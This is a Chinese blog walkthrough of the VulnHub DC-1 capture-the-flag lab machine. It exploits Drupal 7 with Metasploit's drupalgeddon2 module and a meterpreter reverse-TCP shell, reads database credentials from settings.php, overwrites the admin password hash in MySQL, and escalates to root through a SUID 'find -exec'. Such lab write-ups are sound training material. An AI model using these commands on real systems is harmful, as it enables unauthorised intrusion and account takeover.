靶机DC-1

原创 已于 2023-08-13 16:04:23 修改 · 261 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2023-08-04 18:58:23 首次发布
文章讲述了在DC-1靶机上进行环境搭建,通过信息收集和漏洞检测发现Drupal7系统漏洞,利用geddon2漏洞获取Meterpretershell,进一步通过配置文件和数据库操作获取权限,最终实现提权和找到所有flag的过程。

目录

环境搭建

DC-1靶机 下载地址:https://www.vulnhub.com/

kali 下载地址:https://www.kali.org/

将两台虚拟机都设置为nat模式

信息收集

  1. 扫描靶机ip

    nmap 192.168.117.0/24

在这里插入图片描述

  1. 对靶机进行详细扫描

    nmap -A 192.168.117.144 -p-

在这里插入图片描述

  1. 开放80端口,用浏览器访问

在这里插入图片描述

  1. 使用wappalyzer插件,可以看到靶机系统为Drupal 7,网站可能存在漏洞

在这里插入图片描述

  1. 尝试注册用户,注册失败

在这里插入图片描述

  1. 扫描敏感目录,发现都没什么用
  dirb http://192.168.117.144

在这里插入图片描述

漏洞检测

  1. 进入msf工具,查找系统漏洞

    msfconsole
//进入msf工具

search Drupa
//查找Drupa系统的漏洞

在这里插入图片描述

  1. 经过尝试,发现只有geddon2漏洞可以利用,查看并选择payload,选择meterpreter目录下的reverse_tcp服务

    use 1
//使用第一个漏洞

show payloads
//查看payloads

set payload php/meterpreter/reverse_tcp
//选择tcp服务

在这里插入图片描述

在这里插入图片描述

  1. 查看是否有需要手工设置的选项

    show options

在这里插入图片描述

  1. 其中required显示为yes表示需要我们手动设置,从描述看出,rhosts最有可能需要我们设置,设置完ip地址后运行

    set rhosts 192.168.117.144

run

在这里插入图片描述

  1. 可以看到我们获得了meterpreter的shell,表明我们成功入侵了该靶机,并且可以看到攻击机和被攻击机的ip

漏洞利用

  1. 查看靶机文件,发现第一个flag

    ls
//查看当前目录下文件

cat flag1.txt

在这里插入图片描述

在这里插入图片描述

  1. 第一个flag意思是“每个好的CMS都需要一个配置文件 - 你也是。”提示需要查找cms的配置文件,此时有两种方法

    1. 在该目录下遍历所有的子目录及文件,查找所有配置文件,发现在/sites/default下存在setting.php文件

    2. 开启一个shell,使用find命令查找包含set的文件

      shell

python -c "import pty;pty.spawn('/bin/bash')"

find ./ -name "set*"

  2. 查看配置文件

    cat ./sites/default/settings.php

在这里插入图片描述

  1. 得到第二个flag,意思是“暴力破解和字典攻击并不是获得访问权限的唯一方法(您将需要访问权限)。 您可以使用这些凭据做什么?”得到数据库的用户名和密码,就想办法进入mysql

  2. 打开shell,进入交互模式(如果第二步进入则无需再次进入)

    shell

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

  1. 登录mysql

    mysql -udbuser -pR0ck3t

在这里插入图片描述

  1. 查看数据库信息,查找是否有user表

    show databases;

use drupaldb;

show tables;

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

  1. 发现其中有users表,查看用户信息

    select * from users;

在这里插入图片描述

  1. users表中密码被加密,哈希密码是单向不可逆的,很难被解密软件爆破,因此采用替换的方法,找到靶机的加密算法,将我们自己设定的密码转换为哈希密文,并替换users表中的密码

  2. 查百度发现drupal默认使用passwd_hash.sh生成密码,查找该文件

    find ./ -name "*hash*"

在这里插入图片描述

  1. 查看这个hash文件,确认是否是需要的文件

    cat ./scripts/password-hash.sh

在这里插入图片描述

  1. 生成密码为dc1的哈希值

    php ./scripts/password-hash.sh dc1

在这里插入图片描述

  1. 登录数据库,进行替换

    mysql -udbuser -pR0ck3t

update drupaldb.users set pass="$S$DVftcmOmxR/.9z3nr04ywKkGVHKdIbhVItV5Ruk5u9BUuHk3Aq82" where name="admin";

在这里插入图片描述

  1. 使用admin登录,密码为dc1

在这里插入图片描述

  1. 找寻有用的信息,在Dashboard中发现第三个flag

在这里插入图片描述

在这里插入图片描述

  1. 第三个flag意思是“特殊的权限将帮助找到密码 - 但您需要执行一些命令来弄清楚如何获隐藏内容。”提示为:提权,passwd文件、shadow文件

  2. 退出mysql,尝试查看passwd文件是否存在

    cat /etc/passwd

在这里插入图片描述

  1. 发现第四个flag的路径,进入此路径查看flag4

    cat /home/flag4/flag4.txt

在这里插入图片描述

提权

  1. 第四个flag意思是“您可以使用相同的方法来查找或访问 root 中的flag吗?可能。但也许这并不容易。 或者也许是?”提示另一个flag在root里,需要提权,尝试查找flag文件

    find / -name "*flag*"

在这里插入图片描述

  1. 最后一个flag在root中,使用提示中的find -perm命令进行提权

    find / -perm -u=s -type f 2>/dev/null

//-perm 按照权限查找
  -u=s  拥有者是s权限
  -type 查找,f文件、d目录、c字符设备
  2>/dev/null 将标准错误stderr删掉

在这里插入图片描述

  1. 查找出有root权限的目录,发现/usr/bin/find是root权限

  2. 创建一个文件dc-1,测试-exec后的命令是否能执行

    touch dc-1

find dc-1 -exec whoami \;

在这里插入图片描述

  1. 确认find拥有root权限,并且-exec后的命令可以以root权限执行,打开最后一个flag

    find dc-1 -exec cat /root/thefinalflag.txt \;

在这里插入图片描述

  1. 最后一个flag意思是“干的好!!!!希望您喜欢这个并学到了一些新技能。”
ISCC--实战第一阶段(记Drupal漏洞利用)
qq_73767109的博客
05-19 563
或者进入pycharm中(如果是用pycharm的话)在里面搜索beautifulsoup4下载即可。使用最常见的cve-2018-7600漏洞。如果报错可以尝试进入python输入。输入ps -ef查看进程即可。按要求下载VPN连接后。用linux搜索相关漏洞。在网上搜索该漏洞的poc。把地址改成需要利用的地址。
Drupal远程代码执行漏洞(CVE-2019-6339)
weixin_46411728的博客
08-25 3237
Drupal 远程代码执行漏洞(CVE-2019-6339)
渗透测试靶机DC-1
my的博客
08-05 821
DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机,我选择nat模式,但必须kali也设为net。脚本用PHP写的,还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123456。Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置。报错,因为python3和Python2版本不同,print语句也不同,可以将。该文件存储了系统用户的基本信息,所有用户都可以对其进行文件操作读。该文件存储了系统用户的密码等信息,只有root权限用户才能读取。
Drupal漏洞Drupal 7.31 SQL漏洞
2301_77778745的博客
04-25 859
1.通过python调用drupal7.x.py脚本对数据库进行注入。test test(后面两个test是新设的用户名和密码)2.输入命令:python drupal7.x.py。
漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)
qq_45751902的博客
10-23 2801
的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令,紧随账号,密码。
靶机DC-1 11111
09-25
靶机DC-1 11111作为一款特定型号的靶机,其名称中的“DC-1”很可能代表了某种特定的技术指标或者代号,而“11111”则可能指示了该靶机的序列号或是特定批次的编号。由于信息量有限,我们无法直接推断出该靶机的详细...
渗透靶机DC-1解析.docx
12-14
渗透靶机DC-1解析.docx
vulnhub靶机DC-1
cyzCc的博客
02-15 1212
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
DC系列打穿靶机DC-1靶机妈生教程!
m0_53419560的博客
11-19 1300
声明:该笔记为up主的课程笔记,本节链接。警告:本教程仅作学习用途,若有用于非法行为的,概不负责。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1683
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践
gitblog_00043的博客
06-22 839
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践 去发现同类优质开源项目:https://gitcode.com/ 在网络安全的暗潮中,漏洞是永远的话题。今天,我们将深入探讨一个专为Drupal 7设计的安全研究工具,该工具针对著名的CVE-2018-7600与CVE-2018-7602漏洞进行了精准打击。对于那些对Web安全充满好奇,或是负责网站维护、安全审计的专业人士而言,这无疑是一个...
Drupal 7.31 SQL注入漏洞利用详解及EXP
热门推荐
Exploit的小站~
05-10 3万+
 有意迟几天放出来这篇文章以及程序,不过看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,不过说实话这个洞威力挺大的,当然,这也是Drupal本身没有意料到的。 0x00 首先,这个漏洞真的很大,而且Drupal用的也比较多,应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp。不过,这个洞好像不怎么被重视,这也是极为不合适。...
DC-1 靶机渗透学习
b1n的博客
09-12 512
DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-1.zip(DC后的数字可以换成1-8中任意一个)下载好后解压好后,用vmvare直接打开虚拟机,导入时可能会提示错误,重试就可以了,打开靶机,打开如下就是正常的,靶机默认桥接。
drupal 7 ajax,【漏洞分析】CVE-2018-7600 Drupal 7.x 版本代码执行
weixin_35700003的博客
08-06 1582
阅读:8,003CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出来之后大家都赶紧分析了一波,然后热度似乎慢慢退去了。两天前Drupalgeddon2项目更新了7.x版本的exp,实际环境也出现了利用,下面就简单来看一下0x01 概述CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出...
DC-1靶机练习
yunshang_secure的博客
01-25 1515
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
VulnHub — Lampiao
qq_61768489的博客
09-09 2336
信息收集 msfconsole 脏牛提权。
Drupal远程代码执行漏洞(CVE-2018-7602)
weixin_46411728的博客
08-24 1703
CVE-2018-7602
Drupal远程代码执行漏洞(CVE-2018-7600)
ANOrange的博客
04-10 1486
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
靶机DC系列 DC:1
一个努力学习网安的小牛马
10-31 171
其中rpcbind是拥有该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。第一个尝试过了无法使用那就使用第二个输入use exploit/unix/webapp/drupal_drupalgeddon2引用该模块。使用该payload 并用show option查看还有什么需要设置。上面说我们执行需要设置目标机的ip我们设置一下。执行该脚本./tmp/shell.sh成功弹入。
vulnhub靶机dc-1
最新发布
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值